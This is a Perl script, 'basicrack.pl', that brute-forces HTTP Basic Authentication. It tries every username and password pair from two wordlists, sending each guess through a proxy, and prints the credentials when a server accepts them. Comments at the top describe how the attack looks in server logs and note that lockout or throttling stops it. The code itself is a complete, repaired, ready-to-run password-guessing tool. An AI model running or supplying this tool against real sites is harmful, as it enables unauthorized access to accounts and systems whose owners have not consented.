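#!/usr/bin/perl
# ---- basicrack.pl
# http Basic Authorization brute forcer.
# use your favorite wordlists as $userfile and $passfile.
#
# White_E
# http://ttj.virtualave.net/
#
# Review notes (what this script looks like from the defending side):
#  - Guesses are strictly sequential: every password is tried for the first
#    user name, then for the second, and so on.
#  - Each guess opens a fresh TCP connection to $proxy and sends a single
#    HTTP/1.0 GET in absolute-URI form. The header set never changes
#    (Referer equal to the requested URL, "Proxy-Connection: Keep-Alive");
#    only the Authorization value differs between requests.
#  - In server or proxy logs this shows up as a run of 401 responses for one
#    URL with a different Authorization header each time. Throttling or
#    lockout on repeated 401s per account or source is the control that
#    bounds this loop; the script has no handling for either and simply
#    prints any status other than 200 or 401 and moves on.
#  - Basic credentials are only base64-encoded (see base64en), not encrypted,
#    and the URL pattern below accepts plain http:// only.
#
# Changes from the listing as extracted: the <HANDLE> read operators that
# were stripped from the page are restored, strict/warnings are enabled,
# file and socket handles are lexical, and open()/socket() are checked
# instead of failing silently.

use strict;
use warnings;
use Socket;

my $userfile = 'hoge.txt';    # username lists
my $passfile = 'gimue.di';    # password lists
my $url      = 'http://';     # URL you want to get in
my $proxy    = '';            # your favorite proxy server

# 6-bit group ("000000".."111111") => base64 character; filled on first use
# by e_base64_table().
our %e_base64;

$| = 1;

# $proxy is "host:port"; an empty value leaves both parts undefined.
my ($phost, $pport) = split(':', $proxy);
die "Err: \$proxy must be set as host:port.\n"
    unless defined $phost && defined $pport;

my $addr  = inet_aton($phost) || die "Err: $phost not found.\n";
my $paddr = sockaddr_in($pport, $addr);

# Split the URL into host and path. Only http:// with at least one "/"
# after the host is accepted.
my ($host, $file);
if ($url =~ m{^http://([^/]*)/(.*)$}) {
    $host = $1;
    $file = $2;
}
else {
    die "Err: can't handle the URL.\n";
}

# Three-argument open with a lexical handle: the file name cannot be read as
# an open mode, and a missing word list is reported instead of silently
# yielding an empty list.
open(my $user_fh, '<', $userfile) or die "Err: can't open $userfile: $!\n";
my @ulist = <$user_fh>;
close($user_fh);

open(my $pass_fh, '<', $passfile) or die "Err: can't open $passfile: $!\n";
my @plist = <$pass_fh>;
close($pass_fh);

chomp(@ulist);
chomp(@plist);

for my $user (@ulist) {
    for my $pass (@plist) {
        my $uandp = "$user:$pass";
        print "trying $uandp\n";
        my $attack = base64en($uandp);

        socket(my $sock, PF_INET, SOCK_STREAM, getprotobyname('tcp'))
            or die "Err: socket(): $!\n";
        # Unbuffer the socket so the request is sent as soon as it is printed.
        select($sock);
        $| = 1;
        select(STDOUT);
        connect($sock, $paddr) || die "Err: connect().\n";

        # The empty line before the terminator ends the header block.
        print {$sock} <<"__ATTACK__";
GET http://$host/$file HTTP/1.0
Referer: http://$host/$file
Host: $host
Proxy-Connection: Keep-Alive
Authorization: Basic $attack

__ATTACK__

        # Scalar-context read: only the first response line (the status
        # line) is looked at.
        my $rep = <$sock>;
        close($sock);
        $rep = '' unless defined $rep;    # peer closed without answering

        if ($rep =~ m/\s200\s/) {
            print "**** Cracked! $uandp\n";
            print "$rep";
            exit;
        }
        elsif ($rep =~ m/\s401\s/) {
            # print "Err0r 401. $uandp\n";
            next;
        }
        else {
            print "Err0r: $rep";
        }
    }
}

print "---- Done.\n";
exit;

# thanks to Wake Tsuneaki (http://cgiroom.nu/)

# Fill %e_base64 with the 64 entries of the standard base64 alphabet, keyed
# by the 6-character bit string of each index (0 => "000000" => 'A', ...,
# 63 => "111111" => '/').
sub e_base64_table {
    my @alphabet = ('A' .. 'Z', 'a' .. 'z', '0' .. '9', '+', '/');
    %e_base64 = map { sprintf('%06b', $_) => $alphabet[$_] } 0 .. $#alphabet;
}

# Base64-encode the string passed as the first argument and return the
# encoded text, '='-padded to a multiple of four characters.
sub base64en {
    my ($plain) = @_;
    e_base64_table() unless %e_base64;

    # Work on the input as a string of '0'/'1' characters, zero-padded to a
    # whole number of 6-bit groups.
    my $bits = unpack('B*', $plain);
    my $tail = length($bits) % 6;
    $bits .= '0' x (6 - $tail) if $tail;

    # Replace every 6-bit group by its alphabet character.
    (my $encoded = $bits) =~ s/(......)/$e_base64{$1}/g;

    my $short = length($encoded) % 4;
    $encoded .= '=' x (4 - $short) if $short;
    return $encoded;
}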